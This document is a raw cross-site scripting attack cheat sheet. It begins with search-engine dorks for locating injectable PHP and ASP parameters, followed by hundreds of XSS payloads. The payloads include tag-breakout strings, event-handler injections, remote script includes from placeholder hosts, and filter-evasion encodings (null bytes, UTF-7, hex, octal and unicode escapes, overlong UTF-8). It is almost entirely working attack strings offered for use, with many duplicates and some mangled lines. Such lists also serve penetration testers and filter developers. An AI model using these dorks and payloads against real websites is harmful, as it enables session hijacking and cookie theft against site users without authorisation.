- XSS DORKS
- inurl:".php?cmd="
- inurl:".php?z="
- inurl:".php?q="
- inurl:".php?search="
- inurl:".php?query="
- inurl:".php?searchstring="
- inurl:".php?keyword="
- inurl:".php?file="
- inurl:".php?years="
- inurl:".php?txt="
- inurl:".php?tag="
- inurl:".php?max="
- inurl:".php?from="
- inurl:".php?author="
- inurl:".php?pass="
- inurl:".php?feedback="
- inurl:".php?mail="
- inurl:".php?cat="
- inurl:".php?vote="
- inurl:search.php?q=
- inurl:com_feedpostold/feedpost.php?url=
- inurl:scrapbook.php?id=
- inurl:headersearch.php?sid=
- inurl:/poll/default.asp?catid=inurl:/search_results.php?search=
- -------------XSS Payloads--------------
- Ultimate Cross Site Scripting Attack Cheat Sheet
- Event-handler attributes that can trigger XSS:
- onclick
- ondblclick
- onmousedown
- onmousemove
- onmouseover
- onmouseout
- onmouseup
- onkeydown
- onkeypress
- onkeyup
- onabort
- onerror
- onload
- onresize
- onscroll
- onunload
- onsubmit
- onblur
- onchange
- onfocus
- onreset
- onselect
- onMoveOn
- Brackets for Tags
- >"
- ">
- <"
- ><
- >"<
- .\>"</.
- ./>%20<./
- />%20<
- %20/%20>
- %20">%20<
- %3E%3C
- Pjw=
- XSS Strings:
- <meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
- <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
- <SCRIPT>document.cookie=true;</SCRIPT>
- <IMG SRC="jav ascript:document.cookie=true;">
- <IMG SRC="javascript:document.cookie=true;">
- <IMG SRC="  javascript:document.cookie=true;">
- <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
- <SCRIPT>document.cookie=true;//<</SCRIPT>
- <SCRIPT <B>document.cookie=true;</SCRIPT>
- <IMG SRC="javascript:document.cookie=true;">
- <iframe src="javascript:document.cookie=true;>
- <SCRIPT>a=/XSS/\ndocument.cookie=true;</SCRIPT>
- </TITLE><SCRIPT>document.cookie=true;</SCRIPT>
- <INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
- <BODY BACKGROUND="javascript:document.cookie=true;">
- <BODY ONLOAD=document.cookie=true;>
- <IMG DYNSRC="javascript:document.cookie=true;">
- <IMG LOWSRC="javascript:document.cookie=true;">
- <BGSOUND SRC="javascript:document.cookie=true;">
- <BR SIZE="&{document.cookie=true}">
- <LAYER SRC="javascript:document.cookie=true;"></LAYER>
- <LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
- <STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>XSS
- �script�document.cookie=true;�/script�
- <IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
- <FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
- <TABLE BACKGROUND="javascript:document.cookie=true;">
- <TABLE><TD BACKGROUND="javascript:document.cookie=true;">
- <DIV STYLE="background-image: url(javascript:document.cookie=true;)">
- <DIV STYLE="background-image: url(javascript:document.cookie=true;)">
- <DIV STYLE="width: expression(document.cookie=true);">
- <STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
- <IMG STYLE="xss:expr/*XSS*/ession(document.cookie=true)">
- <XSS STYLE="xss:expression(document.cookie=true)">
- exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.cookie=true)'>
- <STYLE TYPE="text/javascript">document.cookie=true;</STYLE>
- <STYLE>.XSS{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=XSS></A>
- <STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE>
- <SCRIPT>document.cookie=true;</SCRIPT>
- <BASE HREF="javascript:document.cookie=true;//">
- <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
- <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
- <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
- <? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
- <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
- <a href="javascript#document.cookie=true;">
- <div onmouseover="document.cookie=true;">
- <img src="javascript:document.cookie=true;">
- <img dynsrc="javascript:document.cookie=true;">
- <input type="image" dynsrc="javascript:document.cookie=true;">
- <bgsound src="javascript:document.cookie=true;">
- &<script>document.cookie=true;</script>
- &{document.cookie=true;};
- <img src=&{document.cookie=true;};>
- <link rel="stylesheet" href="javascript:document.cookie=true;">
- <img src="mocha:document.cookie=true;">@mario_payload
- <img src="livescript:document.cookie=true;">
- <a href="about:<script>document.cookie=true;</script>">
- <body onload="document.cookie=true;">
- <div style="background-image: url(javascript:document.cookie=true;);">
- <div style="behaviour: url([link to code]);">
- <div style="binding: url([link to code]);">
- <div style="width: expression(document.cookie=true;);">
- <style type="text/javascript">document.cookie=true;</style>
- <object classid="clsid:..." codebase="javascript:document.cookie=true;">
- <style><!--</style><script>document.cookie=true;//--></script>
- <<script>document.cookie=true;</script>
- <script>document.cookie=true;//--></script>
- <!-- -- --><script>document.cookie=true;</script><!-- -- -->
- <img src="blah"onmouseover="document.cookie=true;">
- <img src="blah>" onmouseover="document.cookie=true;">
- <xml src="javascript:document.cookie=true;">
- <xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
- <div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>
- Restriction Bypass:
- >"<iframe src=http://global-evolution.info/>@gmail.com
- >"<script>alert(document.cookie)</script><div style="1@gmail.com
- >"<script>alert(document.cookie)</script>@gmail.com
- <html><body>
- <button.onclick="alert(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,
- 101,114,116,40,34,67,114,111,115,115,83,105,116,101,83,99,114,105,112,116,105,1
- 10,103,64,82,69,77,79,86,69,34,41,60,47,115,99,114,105,112,116,62));">String:fr
- om.Char.Code</button></body></html>
- %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%43%72%6F
- %73%73%53%69%74%65%53%63%72%69%70%74%69%6E%67%32%22%29%3C%2F
- %73%63%72%69%70%74%3E
- Obfuscated Bypass:
- >�<ScriPt>ALeRt("xssOBFSbypass")</scriPt>
- XSS with close TAG to escape:
- >"<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
- >"<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
- >"<SCRIPT>document.cookie=true;</SCRIPT>
- >"<IMG SRC="jav ascript:document.cookie=true;">
- >"<IMG SRC="javascript:document.cookie=true;">
- >"<IMG SRC="  javascript:document.cookie=true;">
- >"<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
- >"<SCRIPT>document.cookie=true;//<</SCRIPT>
- >"<SCRIPT <B>document.cookie=true;</SCRIPT>
- >"<IMG SRC="javascript:document.cookie=true;">
- >"<iframe src="javascript:document.cookie=true;>
- >"<SCRIPT>a=/XSS/\ndocument.cookie=true;</SCRIPT>
- >"</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
- >"<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
- >"<BODY BACKGROUND="javascript:document.cookie=true;">
- >"<BODY ONLOAD=document.cookie=true;>
- >"<IMG DYNSRC="javascript:document.cookie=true;">
- >"<IMG LOWSRC="javascript:document.cookie=true;">
- >"<BGSOUND SRC="javascript:document.cookie=true;">
- >"<BR SIZE="&{document.cookie=true}">
- >"<LAYER SRC="javascript:document.cookie=true;"></LAYER>
- >"<LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
- >"<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>XSS
- >"�script�document.cookie=true;�/script�
- >"<IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
- >"<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
- >"<TABLE BACKGROUND="javascript:document.cookie=true;">
- >"<TABLE><TD BACKGROUND="javascript:document.cookie=true;">
- >"<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
- >"<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
- >"<DIV STYLE="width: expression(document.cookie=true);">
- >"<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
- >"<IMG STYLE="xss:expr/*XSS*/ession(document.cookie=true)">
- >"<XSS STYLE="xss:expression(document.cookie=true)">
- >"exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.cookie=true)'>
- >"<STYLE TYPE="text/javascript">document.cookie=true;</STYLE>
- >"<STYLE>.XSS{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=XSS></A>
- >"<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE>
- >"<SCRIPT>document.cookie=true;</SCRIPT>
- >"<BASE HREF="javascript:document.cookie=true;//">
- >"<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
- >"<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- >"<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
- >"<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
- >"<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
- >"<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
- >"<a href="javascript#document.cookie=true;">
- >"<div onmouseover="document.cookie=true;">
- >"<img src="javascript:document.cookie=true;">
- >"<img dynsrc="javascript:document.cookie=true;">
- >"<input type="image" dynsrc="javascript:document.cookie=true;">
- >"<bgsound src="javascript:document.cookie=true;">
- >"&<script>document.cookie=true;</script>
- >"&{document.cookie=true;};
- >"<img src=&{document.cookie=true;};>
- >"<link rel="stylesheet" href="javascript:document.cookie=true;">
- >"<img src="mocha:document.cookie=true;">
- >"<img src="livescript:document.cookie=true;">
- >"<a href="about:<script>document.cookie=true;</script>">
- >"<body onload="document.cookie=true;">
- >"<div style="background-image: url(javascript:document.cookie=true;);">
- >"<div style="behaviour: url([link to code]);">
- >"<div style="binding: url([link to code]);">
- >"<div style="width: expression(document.cookie=true;);">
- >"<style type="text/javascript">document.cookie=true;</style>
- >"<object classid="clsid:..." codebase="javascript:document.cookie=true;">
- >"<style><!--</style><script>document.cookie=true;//--></script>
- >"<<script>document.cookie=true;</script>
- >"<script>document.cookie=true;//--></script>
- >"<!-- -- --><script>document.cookie=true;</script><!-- -- -->
- >"<img src="blah"onmouseover="document.cookie=true;">
- >"<img src="blah>" onmouseover="document.cookie=true;">
- >"<xml src="javascript:document.cookie=true;">
- >"<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
- >"<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>
- Others: Random
- ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- '';!--"<XSS>=&{()}
- <SCRIPT SRC=http://test.com/xss.js></SCRIPT>
- <IMG SRC="javascript:alert('XSS');">
- <IMG SRC=javascript:alert('XSS')>
- <IMG SRC=JaVaScRiPt:alert('XSS')>
- <IMG SRC=javascript:alert("XSS")>
- <IMG SRC=`javascript:alert("RM'XSS'")`>
- <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
- <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
- <IMG SRC="jav ascript:alert('XSS');">
- <IMG SRC="jav	ascript:alert('XSS');">
- <IMG SRC="jav
ascript:alert('XSS');">
- <IMG SRC="jav
ascript:alert('XSS');">
- <IMG
- SRC
- =
- "
- j
- a
- v
- ><img id=XSS SRC=x onerror=alert(XSS);>
- ;!--"<XSS>=&{()}"
- <IMG id=XSS SRC="javascript:alert('XSS');">
- <IMG id=XSS SRC=javascript:alert('XSS')>
- <IMG id=XSS SRC=JaVaScRiPt:alert('XSS')>
- <IMG id=XSS SRC=javascript:alert("XSS")>
- <IMG id=XSS SRC=`javascript:alert("'XSS'")`>
- <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
- <IMG id=XSS SRC="jav ascript:alert('XSS');">
- <IMG id=XSS SRC="jav ascript:alert('XSS');">
- <IMG id=XSS SRC="javascript:alert('XSS');">
- <IMG id=XSS SRC="jav
- ascript:alert('XSS');">
- perl -e 'print "<IMG id=XSS SRC=java\0script:alert(\"XSS\")>";' > out
- <IMG id=XSS SRC=" javascript:alert('XSS');">
- <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
- <<SCRIPT>alert("XSS");//<</SCRIPT>
- \";alert('XSS');//
- <IMG id=XSS SRC='javascript:alert('XSS')
- <SCRIPT>alert(/XSS/.source)</SCRIPT>
- <BODY BACKGROUND="javascript:alert('XSS')">
- </TITLE><SCRIPT>alert("XSS");</SCRIPT>
- <INPUT TYPE="IMAGE" id=XSS SRC="javascript:alert('XSS');">
- <BODY ONLOAD=alert('XSS')>
- <IMG DYN id=XSS SRC="javascript:alert('XSS')">
- <IMG LOW id=XSS SRC="javascript:alert('XSS')">
- <BGSOUND id=XSS SRC="javascript:alert('XSS');">
- <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
- <IMG id=XSS SRC='vbscript:msgbox("XSS")'>
- <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
- <TABLE id=XSS BACKGROUND="javascript:alert('XSS')">
- <TABLE id=XSS><TD BACKGROUND="javascript:alert('XSS')">
- <DIV id=XSS STYLE="background-image: url(javascript:alert('XSS'))">
- <DIV id=XSS STYLE="width: expression(alert('XSS'));">
- <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
- <IFRAME id=XSS SRC="javascript:alert('XSS');"></IFRAME>
- <FRAMESET><FRAME id=XSS SRC="javascript:alert('XSS');"></FRAMESET>
- <TABLE BACKGROUND="javascript:alert('XSS')">
- <TABLE><TD BACKGROUND="javascript:alert('XSS')">"
- <DIV id=XSS STYLE="background-image: url(javascript:alert('XSS'))">
- <DIV id=XSS STYLE="width: expression(alert('XSS'));">
- <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
- <IMG id=XSS STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
- <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
- <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
- <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
- <BASE HREF="javascript:alert('XSS');//">
- <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
- a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d);
- <XML id=XSS><X><C><![CDATA[<IMG id=XSS SRC="javas]]><![CDATA[cript:alert('XSS');">]]></C></X><xml><SPAN DATAid=XSS SRC=#I DATAFLD=CDATAFORMATAS=HTML></SPAN>
- <XML ID="XSS"><I><B><IMG id=XSS SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML><SPAN DATAid=XSS SRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
- <XML id=XSS SRC="xsstest.xml" ID=I></XML><SPAN DATAid=XSS SRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"></BODY></HTML>
- <? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
- <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
- //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- <IMG id=XSS SRC=javascript:alert(String.fromCharCode(88,83,83))>
- <IMG id=XSS SRC="&14;javascript:alert('XSS');">
- <SCRIPT <B>=alert('XSS');"></SCRIPT>
- <IFRAME id=XSS SRC="javascript:alert('XSS'); <
- <SCRIPT>a=/XSS/nalert('XSS');</SCRIPT>
- <STYLE>li {list-style-image: url("javascript:alert('XSS');</STYLE><UL><LI>XSS
- <DIV STYLE="background-image: url(javascript:alert('XSS'));">
- <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"></HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
- <a href="javascript#alert('XSS');">
- <div onmouseover="alert('XSS');">,
- <input type="image" dynid=XSS SRC="javascript:alert('XSS');">
- &<script>alert('XSS');</script>">
- <IMG id=XSS SRC=&{alert('XSS');};>
- <a id=XSS href="about:<script>alert('XSS');</script>">
- <DIV id=XSS STYLE="binding: url(javascript:alert('XSS'));">
- <OBJECT classid=clsid:..." codebase="javascript:alert('XSS');">
- <style><!--</style><script>alert('XSS');//--></script>
- ![CDATA[<!--]]<script>alert('XSS');//--></script>
- <!-- -- --><script>alert('XSS');</script><!-- -- -->
- <img id=XSS SRC="blah"onmouseover="alert('XSS');">
- <img id=XSS SRC="blah>"onmouseover="alert('XSS');">
- <xml id="X"><a><b><script>alert('XSS');</script>;<b></a></xml>
- <div datafld="b" dataformatas="html" dataid=XSS SRC="#XSS"></div>
- [\xC0][\xBC]script>alert('XSS');[\xC0][\xBC]/script>
- <XML ID=I><X><C><![CDATA[<IMG id=XSS SRC="javas]]<![CDATA[cript:alert('XSS');">]]</C><X></xml>
- <form id="test" /><button form="test" formaction="javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))">X
- <input id=XSS onfocus=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus>
- <select id=XSS onfocus=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus>
- <textarea id=XSS onfocus=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus>
- <keygen id=XSS onfocus=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus>
- <input id=XSS onblur=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus><input autofocus>
- <video id=XSS poster=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))//
- <body id=XSS onscroll=eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
- <video><source onerror="javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))">
- <video onerror="javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))"><source>
- <iframe id=XSS / /onload=alert(/XSS/)></iframe>
- <iframe id=XSS / "onload=alert(/XSS/)></iframe>
- <iframe id=XSS///////onload=alert(/XSS/)></iframe>
- <iframe id=XSS "onload=alert(/XSS/)></iframe>
- <iframe id=XSS <?php echo chr(11)?> onload=alert(/XSS/)></iframe>
- <iframe id=XSS <?php echo chr(12)?> onload=alert(/XSS/)></iframe>
- " onfocus=alert(XSS) "> <"
- " onblur=alert(XSS) "> <"
- " onmouseover=alert(XSS) ">
- " onclick=alert(XSS) ">
- <FRAMESET><FRAME id=XSS SRC=\"javascript:alert('XSS');\"></FRAMESET>
- <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
- </textarea>'"><script>alert(XSS)</script>
- '""><script language="JavaScript"> alert('X \nS \nS');</script>
- </script></script><<<<script><>>>><<<script>alert(XSS)</script>
- <html><noalert><noscript>(XSS)</noscript><script>(XSS)</script>
- <INPUT TYPE="IMAGE" id=XSS SRC="javascript:alert('XSS');">
- '></select><script>alert(XSS)</script>
- }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
- <SCRIPT>document.write("XSS");</SCRIPT>
- a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
- ='><script>alert("xss")</script>
- <body background=javascript:'"><script>alert(XSS)</script>></body>
- data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
- <SCRIPT>alert('XSS');</SCRIPT>
- '';!--"<XSS>=&{()}
- <IMG id=XSS SRC="javascript:alert('XSS');">
- <IMG id=XSS SRC=javascript:alert('XSS')>
- <IMG id=XSS SRC=JaVaScRiPt:alert('XSS')>
- <IMG id=XSS SRC=javascript:alert("XSS")>
- <IMG id=XSS SRC=`javascript:alert("RSnake says, 'XSS'")`>
- <IMG id=XSS SRC=javascript:alert(String.fromCharCode(88,83,83))>
- id=XSS SRC=<IMG 6;avascript:alert('XSS')>
- <IMG id=XSS SRC=javascript:alert('XSS')>
- <IMG id=XSS SRC=javascript:alert('XSS')>
- <IMG id=XSS SRC="jav ascript:alert('XSS');">
- <IMG id=XSS SRC="jav ascript:alert('XSS');">
- <IMG id=XSS SRC="javascript:alert('XSS');">
- <IMG id=XSS SRC="jav
- ascript:alert('XSS');">
- <IMG id=XSS SRC=" javascript:alert('XSS');">
- <IMG id=XSS SRC="javascript:alert('XSS')"
- <SCRIPT>a=/XSS/
- \";alert('XSS');//
- <INPUT TYPE="IMAGE" id=XSS SRC="javascript:alert('XSS');">
- <BODY BACKGROUND="javascript:alert('XSS')">
- <BODY ONLOAD=alert('XSS')>
- <IMG DYNid=XSS SRC="javascript:alert('XSS')">
- <IMG LOWid=XSS SRC="javascript:alert('XSS')">
- <BGSOUND id=XSS SRC="javascript:alert('XSS');">
- <BR SIZE="&{alert('XSS')}">
- http://xxxx.com/scriptlet.html">>
- <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
- http://xxxx.com/xss.css">
- http://xxxx.com/xss.css>; REL=stylesheet">
- <IMG id=XSS SRC='vbscript:msgbox("XSS")'>
- <IMG id=XSS SRC="mocha:[code]">
- <IMG id=XSS SRC="livescript:[code]">
- <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
- <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
- <META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet">
- http://;URL=javascript:alert('XSS');">
- <IFRAME id=XSS SRC="javascript:alert('XSS');"></IFRAME>
- <FRAMESET><FRAME id=XSS SRC="javascript:alert('XSS');"></FRAMESET>
- <TABLE BACKGROUND="javascript:alert('XSS')">
- <DIV STYLE="background-image: url(javascript:alert('XSS'))">
- <DIV STYLE="background-image: url(javascript:alert('XSS'))">
- <DIV STYLE="width: expression(alert('XSS'));">
- <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
- <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
- <XSS STYLE="xss:expression(alert('XSS'))">
- exp/*<XSS STYLE='no\xss:noxss("*//*");
- <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
- <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
- <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
- <BASE HREF="javascript:alert('XSS');//">
- http://xxxx.com/scriptlet.html">>
- <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
- getURL("javascript:alert('XSS')")
- a="get";
- <!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG id=XSS SRC="javas<![CDATA[cript:alert('XSS');">
- http://xxxx.com/xsstest.xml" ID=I>
- <HTML><BODY>
- <? echo('<SCR)';
- <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
- <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
- PT id=XSS SRC="http://xxxx.com/xss.js">>
- <sCrIpt>alert(1)</ScRipt>
- <iMg srC=1 lAnGuAGE=VbS oNeRroR=mSgbOx(1)>
- Null-byte character between HTML attribute name and equal sign (IE, Safari).
- <img src='1' onerror\x00=alert(0) />
- Slash character between HTML attribute name and equal sign (IE, Firefox, Chrome, Safari).
- <img src='1' onerror/=alert(0) />
- Vertical tab between HTML attribute name and equal sign (IE, Safari).
- <img src='1' onerror\x0b=alert(0) />
- Null-byte character between equal sign and JavaScript code (IE).
- <img src='1' onerror=\x00alert(0) />
- Null-byte character between characters of HTML attribute names (IE).
- <img src='1' o\x00nerr\x00or=alert(0) />
- Null-byte character before characters of HTML element names (IE).
- <\x00img src='1' onerror=alert(0) />
- Null-byte character after characters of HTML element names (IE, Safari).
- <script\x00>alert(1)</script>
- Null-byte character between characters of HTML element names (IE).
- <i\x00mg src='1' onerror=alert(0) />
- Use slashes instead of whitespace (IE, Firefox, Chrome, Safari).
- <img/src='1'/onerror=alert(0)>
- Use vertical tabs instead of whitespace (IE, Safari).
- <img\x0bsrc='1'\x0bonerror=alert(0)>
- Use quotes instead of whitespace in some situations (Safari).
- <img src='1''onerror='alert(0)'>
- <img src='1'"onerror="alert(0)">
- Use null bytes instead of whitespace in some situations (IE).
- <img src='1'\x00onerror=alert(0)>
- Just don't use spaces (IE, Firefox, Chrome, Safari).
- <img src='1'onerror=alert(0)>
- Prefix URI schemes.
- Firefox (\x09, \x0a, \x0d, \x20)
- Chrome (Any character \x01 to \x20)
- <iframe src="\x01javascript:alert(0)"></iframe> <!-- Example for Chrome -->
- No greater-than characters needed (IE, Firefox, Chrome, Safari).
- <img src='1' onerror='alert(0)' <
- Extra less-than characters (IE, Firefox, Chrome, Safari).
- <<script>alert(0)</script>
- Backslash character between expression and opening parenthesis (IE).
- <style>body{background-color:expression\(alert(1))}</style>
- JavaScript Escaping
- <script>document.write('<a hr\ef=j\avas\cript\:a\lert(2)>blah</a>');</script>
- Encoding Galore.
- HTML Attribute Encoding
- <img src="1" onerror="alert(1)" />
- <img src="1" onerror="alert(1)" />
- <iframe src="javascript:alert(1)"></iframe>
- <iframe src="javascript:alert(1)"></iframe>
- URL Encoding
- <iframe src="javascript:alert(1)"></iframe>
- <iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe>
- CSS Hexadecimal Encoding (IE specific examples)
- <div style="x:expression(alert(1))">Joker</div>
- <div style="x:\65\78\70\72\65\73\73\69\6f\6e(alert(1))">Joker</div>
- <div style="x:\000065\000078\000070\000072\000065\000073\000073\000069\00006f\00006e(alert(1))">Joker</div>
- <div style="x:\65\78\70\72\65\73\73\69\6f\6e\028 alert \028 1 \029 \029">Joker</div>
- JavaScript (hexadecimal, octal, and unicode)
- <script>document.write('<img src=1 onerror=alert(1)>');</script>
- <script>document.write('\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x31\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x31\x29\x3E');</script>
- <script>document.write('\074\151\155\147\040\163\162\143\075\061\040\157\156\145\162\162\157\162\075\141\154\145\162\164\050\061\051\076');</script>
- <script>document.write('\u003C\u0069\u006D\u0067\u0020\u0073\u0072\u0063\u003D\u0031\u0020\u006F\u006E\u0065\u0072\u0072\u006F\u0072\u003D\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029\u003E');</script>
- JavaScript (Decimal char codes)
- <script>document.write('<img src=1 onerror=alert(1)>');</script>
- <script>document.write(String.fromCharCode(60,105,109,103,32,115,114,99,61,49,32,111,110,101,114,114,111,114,61,97,108,101,114,116,40,48,41,62));</script>
- JavaScript (Unicode function and variable names)
- <script>alert(123)</script>
- <script>\u0061\u006C\u0065\u0072\u0074(123)</script>
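- Overlong UTF-8 (SiteMinder is awesome!) — these byte sequences are not valid UTF-8; a decoder that rejects overlong forms before any filtering runs never maps them to the characters listed below.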
- < = %C0%BC = %E0%80%BC = %F0%80%80%BC
- > = %C0%BE = %E0%80%BE = %F0%80%80%BE
- ' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
- " = %C0%A2 = %E0%80%A2 = %F0%80%80%A2
